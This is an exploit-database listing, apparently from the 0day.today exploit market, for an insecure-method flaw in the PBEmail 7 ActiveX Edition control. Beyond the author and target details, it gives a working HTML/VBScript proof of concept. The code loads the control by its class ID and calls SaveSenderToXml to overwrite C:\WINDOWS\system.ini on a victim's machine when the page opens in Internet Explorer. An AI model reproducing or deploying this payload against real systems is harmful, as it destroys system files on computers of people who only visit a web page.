[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PBEmail 7 ActiveX Edition Insecure Method Exploit

Author
Katatafish
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9056
Category
remote exploits
Date add
11-10-2007
Platform
unsorted
=================================================
PBEmail 7 ActiveX Edition Insecure Method Exploit
=================================================

<pre>
<b>Found by</b>: Katatafish (karatatata{at}hush{dot}com)
<b>software</b>:PBEmail 7 ActiveX Edition
<b>Vendor:</b> http://www.perfectionbytes.com
<b>vulnerability</b>: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
<b>Tested on Internet explorer 7 with Windows XP SP 2.</b>
<b>Thanks:</b> str0ke

</pre>

<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC" 
id="kat"></object>	
<script language="vbscript">
  kat.SaveSenderToXml "C:\WINDOWS\system.ini"
  MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now 
be overwriten.")
</script>



#  0day.today [2024-12-27]  #